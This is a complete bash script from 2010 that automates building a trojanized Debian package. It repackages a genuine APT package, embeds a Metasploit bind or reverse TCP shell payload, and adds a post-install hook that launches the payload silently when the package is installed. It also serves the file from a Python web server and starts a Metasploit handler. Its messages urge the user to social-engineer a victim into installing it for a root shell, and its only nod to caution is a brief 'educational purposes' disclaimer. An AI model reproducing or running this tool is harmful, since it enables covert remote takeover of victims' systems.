bash script to generate a Debian (.deb) package trojan using Metasploit payload
#!/bin/bash
# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author: Aaron Hine - @redmeat_uk
# Date: 31-01-2010
# Disclaimer: this script should be used for educational purposes. You should obtain permission before running this against an indvidual or company.
# The author is not liable for any illegal use of this script.
scriptname=`basename "$0"`
if [[ $UID -ne 0 ]]; then
echo "${scriptname} must be run as root"
exit 1
fi
#
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo
# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"
# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
dpkg -x $tmpdir/$package* $workdir
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice
if [ "$choice" -eq 1 ]; then
payload="linux/x86/shell/bind_tcp"
echo "Enter IP:"
read rhostIP
echo "Enter port:"
read bindport
options="RHOST=$rhostIP LPORT=$bindport"
else
if [ "$choice" -eq 2 ]; then
payload="linux/x86/shell/reverse_tcp"
echo "Enter IP:"
read lhostIP
echo "Enter port:"
read revport
options="LHOST=$lhostIP LPORT=$revport"
fi
fi
echo
echo "Please enter the filename for the Metasploit payload:"
read filename
echo
cd $workdir
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"
echo "Making post-install script..."
echo
echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst
trojan2=`echo $binary$trojan | sed -e 's/^\///'`
echo "Thanks - generating your payload..."
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo
cd $workdir/DEBIAN
chmod 755 postinst
dpkg-deb --build $workdir
cd $tmpdir
echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
rm -rf $tmpdir
echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo
webserver="python -m SimpleHTTPServer 80"
echo "Would you like a Python webserver ? (y/n) :"
read svr
echo
if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
cd $webroot
$webserver &
echo
else
echo "Fair nuff, setup your own webserver :)"
echo
fi
sleep 1
echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo
if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
echo
$msfdir/msfcli exploit/multi/handler payload=$payload $options E
else
echo "Fair nuff, setup your own handler :)"
echo
fi
